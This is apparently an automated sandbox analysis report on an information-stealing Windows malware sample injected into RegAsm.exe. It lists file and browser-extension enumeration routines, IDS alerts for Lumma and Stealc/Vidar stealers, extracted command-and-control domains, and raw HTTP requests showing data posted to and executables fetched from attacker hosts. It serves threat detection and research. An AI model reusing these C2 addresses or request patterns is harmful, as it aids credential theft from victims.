Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415D9B wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_00415D9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415207 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_00415207
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00414A92 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,	3_2_00414A92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004158D5 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	3_2_004158D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	3_2_0040CD37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B5DF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00414F0C GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

3_2_00414F0C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	13_2_00440118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	13_2_0040F940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_0040F940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	13_2_004109FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2EE0190Fh	13_2_00446C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 68677325h	13_2_00446C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_00446C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	13_2_0040ED69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, ebp	13_2_00422063
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+7Ch]	13_2_00434060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	13_2_00434060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	13_2_00407070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+44h]	13_2_0044716D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+44h]	13_2_0044711B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+7Ch]	13_2_00434136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	13_2_00434136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	13_2_0042A1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_0041518E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh	13_2_00448190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	13_2_0040F242
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-28h]	13_2_0040F242
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+000004F0h]	13_2_00433240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00433240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00433240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00433240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001B8h]	13_2_0041325D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], dx	13_2_00422260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	13_2_004492C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_00425320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	13_2_0041B330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, eax	13_2_0040A3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebp, eax	13_2_0040A3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	13_2_00448390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, ebx	13_2_00430399
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	13_2_00449410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	13_2_00444480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	13_2_004354A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [esi], ax	13_2_0041F552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000110h]	13_2_0041F552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	13_2_00445580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	13_2_00440580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	13_2_00449580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], dx	13_2_00422673
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	13_2_0044A610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_004296C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_004446C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], dx	13_2_0042268A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	13_2_00449690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	13_2_004276A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]	13_2_00408750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, edi	13_2_0042F700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then shrd esi, edx, 00000001h	13_2_00403710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	13_2_00431720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 77DD2217h	13_2_00420729
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then lea eax, dword ptr [ebp+04h]	13_2_004407E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	13_2_00449780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	13_2_0044A7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp+24h], DEC6D8DEh	13_2_00430810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 3BABA5E0h	13_2_00444960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	13_2_00427900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	13_2_0044A920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	13_2_00449A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	13_2_0040DA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, edi	13_2_0042FAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	13_2_00404B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	13_2_00444B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	13_2_00413B7C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+18h]	13_2_0042DB00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	13_2_0042DB00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp di, 005Ch	13_2_0041FB39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+68h]	13_2_0041FB39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	13_2_0043BBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	13_2_00448C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	13_2_00405C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	13_2_00422C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	13_2_00441D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	13_2_0041DD55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	13_2_00421DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], dx	13_2_00421DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_00414D8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_0040DE20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	13_2_0042CEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov esi, eax	13_2_00431ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, word ptr [esi]	13_2_00429EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then lea edx, dword ptr [eax+edi]	13_2_0040FEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	13_2_0040FEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	13_2_00421DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], dx	13_2_00421DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	13_2_00428FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	13_2_00428FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+000005A8h]	13_2_00420F8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	29_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	29_2_004014AD

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056161 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI) : 192.168.2.6:49738 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056161 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI) : 192.168.2.6:49737 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056160 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) : 192.168.2.6:58005 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.6:49745 -> 45.132.206.251:80
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.6:49722 -> 172.67.167.90:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 172.67.167.90:443 -> 192.168.2.6:49724
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 172.67.167.90:443 -> 192.168.2.6:49723
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49738 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49738 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49737 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49737 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 172.67.167.90:443 -> 192.168.2.6:49752
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 172.67.167.90:443 -> 192.168.2.6:49751

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: offensivedzvju.shop
Source: Malware configuration extractor	URLs: stogeneratmns.shop
Source: Malware configuration extractor	URLs: fragnantbui.shop
Source: Malware configuration extractor	URLs: drawzhotdog.shop
Source: Malware configuration extractor	URLs: reinforcenh.shop
Source: Malware configuration extractor	URLs: gutterydhowi.shop
Source: Malware configuration extractor	URLs: ghostreedmnu.shop
Source: Malware configuration extractor	URLs: vozmeatillu.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199780418869
Source: Malware configuration extractor	URLs: https://t.me/jamsemlg

Source: global traffic	HTTP traffic detected: GET /jamsemlg HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: bloodqwe.shopConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGDHost: bloodqwe.shopContent-Length: 255Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDHHost: bloodqwe.shopContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJJKFCBGIDGHIECGCBKHost: bloodqwe.shopContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBAECBAEGDGDHIEHIJJHost: bloodqwe.shopContent-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIJJEGDBFIIDGCAKJEBHost: bloodqwe.shopContent-Length: 7085Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDBHost: bloodqwe.shopContent-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBFBGCGIJKJJKFIDBFCHost: bloodqwe.shopContent-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDAAAKJJDBGCBFCBGIHost: bloodqwe.shopContent-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBFHost: bloodqwe.shopContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCGHDHIDHCBGCBGCAEBHost: bloodqwe.shopContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHDAFIDGDAAKEBFHDAHost: bloodqwe.shopContent-Length: 461Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFBAAFCGIEGDHIEBFIIHost: bloodqwe.shopContent-Length: 114353Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJKKJJKJEGIECAKJJEBHost: bloodqwe.shopContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/66f75feece638_ldmg.exe HTTP/1.1Host: files.bloodqwe.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEHHost: bloodqwe.shopContent-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/66f75fd9dc673_vasd.exe HTTP/1.1Host: files.bloodqwe.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKJKJJJECFIEBFHIEGHost: bloodqwe.shopContent-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJKKECFIECAKECAFBGCHost: bloodqwe.shopContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jamsemlg HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=8a305275312b1df9cb_1894863477225248363
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: bloodqwe.shopConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKEBFBAKKFCBGDHDGHDHost: bloodqwe.shopContent-Length: 255Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCGHCBKFCFBFHIDHDBFHost: bloodqwe.shopContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIDGDAKFHIEHJKFHDHDHost: bloodqwe.shopContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIJECFIECBFIDGDAKFHHost: bloodqwe.shopContent-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFIDHDGIEGCAKFIIJKFHost: bloodqwe.shopContent-Length: 7025Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFIDHDGIEGCAKFIIJKFHost: bloodqwe.shopContent-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHDAFIDGDAAKEBFHDAHost: cowod.hopto.orgContent-Length: 2645Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: LIFELINK-ASRU LIFELINK-ASRU

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49739 -> 172.67.167.90:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49735 -> 172.67.167.90:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offensivedzvju.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=IWHnYuofSncPDEimx5tixRdwvfnYtaFEDFX2MKEytaA-1727493825-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: offensivedzvju.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

